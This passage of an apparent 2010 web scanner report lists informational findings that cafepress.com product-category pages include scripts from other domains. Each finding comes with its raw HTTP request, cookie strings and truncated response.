cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59167 Date: Sun, 26 Dec 2010 13:46:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59167 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.9. http://www.cafepress.com/+baby-hat
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58517 Date: Sun, 26 Dec 2010 13:46:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58517 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.10. http://www.cafepress.com/+bags
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bags
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59533
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.11. http://www.cafepress.com/+boxers
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+boxers
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59426
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.12. http://www.cafepress.com/+bumper-stickers
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bumper-stickers
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59721
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.13. http://www.cafepress.com/+buttons
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+buttons
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59616
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.14. http://www.cafepress.com/+calendars
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
